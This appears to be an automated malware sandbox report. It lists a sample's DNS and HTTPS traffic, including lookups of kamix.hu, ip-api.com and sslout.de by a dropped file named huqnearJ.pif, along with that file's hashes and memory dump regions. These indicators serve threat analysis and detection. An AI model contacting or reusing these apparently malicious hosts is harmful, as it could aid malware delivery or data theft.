  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    tls, http2
    72.6kB
    2.1MB
    1537
    1534

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    151 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.237
    13.107.21.237

  • 8.8.8.8:53
    17.160.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    17.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    237.197.79.204.in-addr.arpa
    dns
    73 B
    143 B
    1
    1

    DNS Request

    237.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    105.107.17.2.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    105.107.17.2.in-addr.arpa

  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    55.36.223.20.in-addr.arpa

  • 8.8.8.8:53
    kamix.hu
    dns
    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe
    54 B
    70 B
    1
    1

    DNS Request

    kamix.hu

    DNS Response

    37.17.172.136

  • 8.8.8.8:53
    133.211.185.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    133.211.185.52.in-addr.arpa

  • 8.8.8.8:53
    136.172.17.37.in-addr.arpa
    dns
    72 B
    110 B
    1
    1

    DNS Request

    136.172.17.37.in-addr.arpa

  • 8.8.8.8:53
    ip-api.com
    dns
    huqnearJ.pif
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    1.112.95.208.in-addr.arpa
    dns
    71 B
    95 B
    1
    1

    DNS Request

    1.112.95.208.in-addr.arpa

  • 8.8.8.8:53
    sslout.de
    dns
    huqnearJ.pif
    55 B
    71 B
    1
    1

    DNS Request

    sslout.de

    DNS Response

    134.119.18.23

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    35.15.31.184.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    35.15.31.184.in-addr.arpa

  • 8.8.8.8:53
    79.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    79.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    43.58.199.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    43.58.199.20.in-addr.arpa

  • 8.8.8.8:53
    77.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    77.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    173 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    200.197.79.204.in-addr.arpa
    dns
    73 B
    106 B
    1
    1

    DNS Request

    200.197.79.204.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Libraries\huqnearJ.pif

    Filesize

    66KB

    MD5

    c116d3604ceafe7057d77ff27552c215

    SHA1

    452b14432fb5758b46f2897aeccd89f7c82a727d

    SHA256

    7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

    SHA512

    9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

  • memory/2356-0-0x0000000000790000-0x0000000000791000-memory.dmp

    Filesize

    4KB

  • memory/2356-1-0x0000000000400000-0x00000000005B9000-memory.dmp

    Filesize

    1.7MB

  • memory/4068-4-0x0000000000400000-0x0000000001400000-memory.dmp

    Filesize

    16.0MB

  • memory/4068-7-0x0000000000400000-0x0000000001400000-memory.dmp

    Filesize

    16.0MB

  • memory/4068-9-0x00000000752DE000-0x00000000752DF000-memory.dmp

    Filesize

    4KB

  • memory/4068-10-0x0000000049C10000-0x0000000049C6C000-memory.dmp

    Filesize

    368KB

  • memory/4068-11-0x00000000752D0000-0x0000000075A80000-memory.dmp

    Filesize

    7.7MB

  • memory/4068-12-0x000000004C170000-0x000000004C714000-memory.dmp

    Filesize

    5.6MB

  • memory/4068-13-0x000000004C760000-0x000000004C7BA000-memory.dmp

    Filesize

    360KB

  • memory/4068-14-0x00000000752D0000-0x0000000075A80000-memory.dmp

    Filesize

    7.7MB

  • memory/4068-15-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-20-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-54-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-74-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-72-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-70-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-68-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-64-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-62-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-60-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-58-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-52-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-48-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-46-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-44-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-42-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-38-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-36-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-34-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-32-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-30-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-28-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-26-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-24-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-66-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-22-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-56-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-50-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-18-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-40-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-16-0x000000004C760000-0x000000004C7B5000-memory.dmp

    Filesize

    340KB

  • memory/4068-1101-0x000000004C8C0000-0x000000004C926000-memory.dmp

    Filesize

    408KB

  • memory/4068-1102-0x00000000752D0000-0x0000000075A80000-memory.dmp

    Filesize

    7.7MB

  • memory/4068-1103-0x000000004D7B0000-0x000000004D800000-memory.dmp

    Filesize

    320KB

  • memory/4068-1104-0x000000004D800000-0x000000004D89C000-memory.dmp

    Filesize

    624KB

  • memory/4068-1106-0x00000000752DE000-0x00000000752DF000-memory.dmp

    Filesize

    4KB

  • memory/4068-1107-0x00000000752D0000-0x0000000075A80000-memory.dmp

    Filesize

    7.7MB

  • memory/4068-1109-0x000000004D920000-0x000000004D9B2000-memory.dmp

    Filesize

    584KB

  • memory/4068-1110-0x000000004DA40000-0x000000004DA4A000-memory.dmp

    Filesize

    40KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.